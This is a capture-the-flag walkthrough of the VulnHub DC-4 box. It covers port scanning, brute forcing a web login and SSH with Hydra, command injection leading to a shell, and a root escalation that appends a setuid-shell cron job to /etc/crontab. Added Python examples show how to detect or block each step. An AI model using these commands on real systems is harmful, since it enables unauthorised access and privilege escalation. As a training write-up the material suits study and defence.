Uuuff! Today I got DC-4 done, along with some other stuff. This awesome box takes a little more work. It started with enumerating just 2 ports, SSH and HTTP. Then we see a simple web login page that has no protection at all: it does not block the many login attempts made against it, not even once. Once logged in, we can take the commands the page offers, intercept the request with Burp and tamper with it, which gives us code execution. From there we get a shell and need to escalate privileges twice; the final privilege escalation lets us create a cron job that runs as root every minute and hands us a root shell. Let's get this started!!
Initiated my arp-scan to find the box
```
dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1	a4:08:f5:53:18:56	(Unknown)
192.168.1.175	00:c0:ca:96:e7:91	ALFA, INC.
192.168.1.226	08:00:27:7a:e5:4d	Cadmus Computer Systems
192.168.1.169	88:de:a9:3c:5b:0d	Roku, Inc.
192.168.1.245	9c:ae:d3:ed:d2:7e	Seiko Epson Corporation

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.060 seconds (124.27 hosts/sec). 5 responded
```
I started with a fast nmap scan, then moved to a more targeted one.
```
dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo nmap --min-rate 5000 -p- -sT 192.168.1.226
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-01 21:46 PDT
Nmap scan report for dc-4 (192.168.1.226)
Host is up (0.00046s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:7A:E5:4D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.86 seconds
```
Then I ran the more detailed, targeted scan against the open ports found previously.
```
dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo nmap -sC -sV -p22,80 192.168.1.226 -oA nmap/DC4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-01 21:47 PDT
Nmap scan report for dc-4 (192.168.1.226)
Host is up (0.00040s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 08:00:27:7A:E5:4D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds
```
I decided to move to port 80 here. SSH is usually less likely to be vulnerable, and enumerating it would give me little to no hint about what is running, beyond maybe enumerating usernames. So I moved on to port 80; visiting the HTTP page in the browser presents this.
I ran Nikto in the background, but there was not much to go on from here:
```
dmcxblue@kali:~/Documents/vulnhub/DC4$ nikto -h http://192.168.1.226/ -o nikto-DC4.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.226
+ Target Hostname:    192.168.1.226
+ Target Port:        80
+ Start Time:         2019-09-01 21:51:48 (GMT-7)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2019-09-01 21:52:30 (GMT-7) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
Gobuster found a few directories, but we cannot proceed from here because we need to be logged in.
```
dmcxblue@kali:~/Documents/vulnhub/DC4$ gobuster dir -u http://192.168.1.226/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o gobuster-dc4.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.226/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2019/09/01 21:52:14 Starting gobuster
===============================================================
/login.php (Status: 302)
/index.php (Status: 200)
/images (Status: 301)
/css (Status: 301)
/logout.php (Status: 302)
/command.php (Status: 302)
===============================================================
2019/09/01 21:54:45 Finished
===============================================================
```
After many failed attempts at guessing or SQL injection, I used Burp to brute-force the login page, since nothing else had been working. I captured the request and sent it to Intruder, then set the payloads in their correct positions as shown in the following screenshot.
Then I went to the Payloads tab and added a simple list. To cut time, since I know the password, I just added a few keywords of it so it can be found faster.
We can see that while Burp was attacking, only 1 word came back with a different response length, and this confirms our login has been successful.
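The login form accepted an unlimited number of attempts, which is what made the Intruder run possible. As an added example (not part of the original writeup), here is a small Python detector a defender could run over nginx access logs to spot exactly that pattern: a burst of POSTs to /login.php from one source, followed by a response that differs from the failures, which is the same "one response with a different length" signal Intruder showed. The log lines are constructed for the example; the threshold, the window, and the assumption that a failed login returns 200 while a success redirects with 302 are mine, not something the page states.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# nginx combined log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def _line(ip, second, method, path, status, size):
    """Build one constructed access-log line (helper for the sample data)."""
    return (f'{ip} - - [01/Sep/2019:21:58:{second:02d} -0700] '
            f'"{method} {path} HTTP/1.1" {status} {size} "-" "Mozilla/5.0"')

# Constructed sample log: 12 failed POSTs (200, identical body size) from one
# address within 12 seconds, then one response that differs (302 redirect),
# plus ordinary traffic from a second address. Addresses are from the lab network.
SAMPLE_LOG = (
    [_line("192.168.1.175", s, "POST", "/login.php", 200, 628) for s in range(12)]
    + [_line("192.168.1.175", 12, "POST", "/login.php", 302, 0)]
    + [_line("192.168.1.50", 5, "GET", "/index.php", 200, 1024),
       _line("192.168.1.50", 20, "POST", "/login.php", 200, 628),
       _line("192.168.1.50", 31, "POST", "/login.php", 302, 0)]
)

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    size = m.group("size")
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
        "size": 0 if size == "-" else int(size),
    }

def max_in_window(times, window):
    """Largest number of timestamps that fall inside any span of length `window`."""
    times = sorted(times)
    best = left = 0
    for right in range(len(times)):
        while times[right] - times[left] > window:
            left += 1
        best = max(best, right - left + 1)
    return best

def detect_login_bruteforce(lines, login_path="/login.php", threshold=10, window_seconds=60):
    """Return {ip: details} for sources whose POSTs to the login page reach
    `threshold` attempts inside any `window_seconds` span. `responses` lists
    the distinct (status, size) pairs seen, so a lone outlier after a run of
    identical failures stands out the way it did in Intruder's length column."""
    attempts = defaultdict(list)
    responses = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        attempts[rec["ip"]].append(rec["ts"])
        responses[rec["ip"]].add((rec["status"], rec["size"]))
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, times in attempts.items():
        peak = max_in_window(times, window)
        if peak >= threshold:
            alerts[ip] = {"peak_attempts": peak, "responses": sorted(responses[ip])}
    return alerts

if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['peak_attempts']} login POSTs in one window, "
              f"responses seen {info['responses']}")
```

Pointing `detect_login_bruteforce` at real lines (`open("/var/log/nginx/access.log")`) is enough to run it; the fix on the application side is the usual one, a lockout or rate limit on the login endpoint, which is what the box was missing.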
Once logged in.
After this we notice 3 command options on the page. Selecting the first one, I decided to intercept the request with Burp to see the raw request, so I can manage it better and see if it can be tampered with.
We can see the raw request in Burp.
I sent it to Repeater to tamper with, and we notice that we get code execution.
With this we can try to catch a shell: we edit the second part after the pipe and URL-encode it to receive a shell.
And our shell was popped, using an ncat listener on port 1234.
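The command page takes the selected option and, as the tampered request shows, hands it to a shell, where anything appended after a pipe runs as well. As an added example (not the box's PHP, which the writeup does not show), here is how such a handler can be written so that the submitted value is only ever a key into a fixed allow-list and never reaches a shell. The three option names and their argv vectors are assumptions for illustration.

```python
import subprocess

# Assumed allow-list for the three "System Tools" options. The real commands on
# the DC-4 page are not reproduced here; these argv vectors are illustrative.
ALLOWED_COMMANDS = {
    "list_files": ["ls", "-l", "/"],
    "disk_usage": ["df", "-h"],
    "uptime":     ["uptime"],
}

class UnknownCommand(ValueError):
    """Raised when the submitted value is not one of the fixed option keys."""

def build_command(selection):
    """Translate the submitted form value into a fixed argv vector.

    The value is used only as a dictionary key. Because it is never
    interpreted by a shell, a tampered value such as 'list_files | whoami'
    cannot smuggle in extra commands; it simply fails the lookup.
    """
    try:
        return list(ALLOWED_COMMANDS[selection])   # copy, so callers can't mutate the table
    except KeyError:
        raise UnknownCommand(f"rejected option value: {selection!r}") from None

def is_tampered(selection):
    """True when the value is not a known key; a handler can log these as alerts."""
    return selection not in ALLOWED_COMMANDS

def run_selected(selection, timeout=5.0):
    """Run the allow-listed command with shell=False, so argv goes straight to
    execve and characters like '|' or ';' carry no meaning."""
    argv = build_command(selection)
    completed = subprocess.run(argv, capture_output=True, text=True,
                               timeout=timeout, check=False)
    return completed.stdout

if __name__ == "__main__":
    for value in ("uptime", "list_files | whoami"):
        if is_tampered(value):
            print(f"rejected: {value!r}")
        else:
            print(run_selected(value))
```

The vulnerable shape is the one the writeup exploited: the option's whole command string travels in the request and is passed to a shell function (PHP's `system()` or similar), so the server trusts the client to say what to run. Keying a fixed table on an opaque option name moves that decision back to the server.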
Moving on from here, I noticed 3 user folders in the home directory. Manually viewing them, 'jim' was interesting as it contained an old-passwords.bak file.
```
www-data@dc-4:/home$ ls -la
ls -la
total 20
drwxr-xr-x  5 root    root    4096 Apr  7 02:33 .
drwxr-xr-x 21 root    root    4096 Apr  5 20:24 ..
drwxr-xr-x  2 charles charles 4096 Apr  7 04:31 charles
drwxr-xr-x  3 jim     jim     4096 Apr  7 04:30 jim
drwxr-xr-x  2 sam     sam     4096 Apr  7 04:31 sam
www-data@dc-4:/home$
```
```
www-data@dc-4:/home/jim/backups$ ls -la
ls -la
total 12
drwxr-xr-x 2 jim jim 4096 Apr  7 02:58 .
drwxr-xr-x 3 jim jim 4096 Apr  7 04:30 ..
-rw-r--r-- 1 jim jim 2047 Apr  7 02:26 old-passwords.bak
```
I used this password list to brute-force SSH with Hydra, and it came back with a positive result.
```
dmcxblue@kali:~/Documents/vulnhub/DC4$ hydra 192.168.1.226 -l jim -P old-passwords.txt ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-02 22:51:58
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.1.226:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 76 to do in 00:01h, 16 active
[ssh] host: 192.168.1.226   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-09-02 22:53:45
```
Jim's home folder contains 3 files: 1 directory, 1 ASCII file and 1 SUID file. We learned that the folder was just holding the old-passwords file, so no need for that one. The mbox file was interesting as it contained an email sent to Jim.
```
jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
	(envelope-from <root@dc-4>)
	id 1hCiQe-0000gc-EC
	for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.
```
With this I was still looking for other things, but once I remembered the mail folder '/var/mail', there was another file for Jim.
```
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from <charles@dc-4>)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles
```
Looks like an email from Charles just sending him his own password.
I used the su command and elevated to Charles.
To shorten the enumeration time I used the LinEnum.sh script for privesc enumeration, and a positive result shows up in our local scan.
Let's check this one out; according to teehee's help we can:
```
charles@dc-4:~$ /usr/bin/teehee --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to exit
immediately on error writing to a pipe, and diagnose errors writing to
non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'
```
So this should be quite easy: we can just add a cron job that runs as root every minute and changes the permissions of '/bin/sh' to 4777, which means SUID. With that, simply executing the SUID shell gives us a root shell.
```
charles@dc-4:~$ echo "* * * * * root chmod 4777 /bin/sh" |sudo /usr/bin/teehee -a /etc/crontab
* * * * * root chmod 4777 /bin/sh
charles@dc-4:~$ ls -al /bin/sh
lrwxrwxrwx 1 root root 4 Jan 24  2017 /bin/sh -> dash
charles@dc-4:~$ ls -al /bin/dash
-rwsrwxrwx 1 root root 124492 Jan 24  2017 /bin/dash
charles@dc-4:~$ /bin/sh
# whoami
root
# id
uid=1001(charles) gid=1001(charles) euid=0(root) groups=1001(charles)
# cd /root
# ls
flag.txt
# cat flag.txt
888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.   888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b  888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888  Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.       "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888   888 888 888 888

Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
```
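The escalation works because a root-run teehee can append an arbitrary line to /etc/crontab, and the appended job then turns /bin/dash into a setuid-root binary every minute. As an added example (not part of the original writeup), here is a Python audit a defender could run to catch both halves: it parses the system crontab and flags root jobs that set setuid/setgid bits or chmod a shell binary, and it checks whether a shell binary on the host is currently setuid root. The sample crontab is constructed (the standard Debian default entries plus the line appended in the writeup); the helper names and the list of shell paths are mine.

```python
import os
import re
import stat

# Constructed sample: the usual Debian /etc/crontab defaults plus the line the
# writeup appended with "sudo /usr/bin/teehee -a /etc/crontab".
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root chmod 4777 /bin/sh
"""

# System crontab entry: min hour dom mon dow user command
CRON_RE = re.compile(r'^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+?)\s*$')
# chmod with an octal mode whose high digit sets setuid/setgid (2xxx..7xxx) or a symbolic +s
SUID_CHMOD_RE = re.compile(r'\bchmod\b.*?(?:\b[2-7][0-7]{3}\b|[ugoa]*\+[rwx]*s\b)')
# common shell binaries, matched as whole path tokens
SHELL_RE = re.compile(r'(?:^|\s)(?:/usr)?/bin/(?:sh|dash|bash|zsh)(?=\s|$)')

def parse_system_crontab(text):
    """Return the job entries of a system crontab, skipping comments,
    blank lines and VAR=value assignments."""
    entries = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue
        m = CRON_RE.match(line)
        if m:
            entries.append({"schedule": " ".join(m.groups()[:5]),
                            "user": m.group(6), "command": m.group(7)})
    return entries

def audit_crontab(text):
    """Flag root jobs that grant setuid bits or change a shell binary's mode."""
    findings = []
    for entry in parse_system_crontab(text):
        reasons = []
        if entry["user"] == "root":
            if SUID_CHMOD_RE.search(entry["command"]):
                reasons.append("root job sets a setuid/setgid bit")
            if "chmod" in entry["command"] and SHELL_RE.search(entry["command"]):
                reasons.append("root job changes the mode of a shell binary")
            if reasons and entry["schedule"] == "* * * * *":
                reasons.append("runs every minute, so the change is re-applied if reverted")
        if reasons:
            findings.append({**entry, "reasons": reasons})
    return findings

def is_setuid_root(mode, uid):
    """True for a file owned by root (uid 0) with the setuid bit set,
    i.e. the -rws------ pattern the writeup produced on /bin/dash."""
    return uid == 0 and bool(mode & stat.S_ISUID)

def suid_shells(paths=("/bin/sh", "/bin/dash", "/bin/bash", "/usr/bin/sh", "/usr/bin/bash")):
    """Shell binaries on this host that are currently setuid root.
    os.stat follows symlinks, so /bin/sh -> dash is checked as dash."""
    found = []
    for path in paths:
        if os.path.exists(path):
            st = os.stat(path)
            if is_setuid_root(st.st_mode, st.st_uid):
                found.append(path)
    return sorted(found)

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{f['schedule']}] {f['user']}: {f['command']}")
        for r in f["reasons"]:
            print("   -", r)
    print("setuid-root shells on this host:", suid_shells() or "none")
```

Run against the real file with `audit_crontab(open("/etc/crontab").read())`; pairing it with integrity monitoring on /etc/crontab and /etc/cron.d catches the write itself, and the sudo rule that let a copy of tee run as root with a caller-chosen output file is the root cause worth removing.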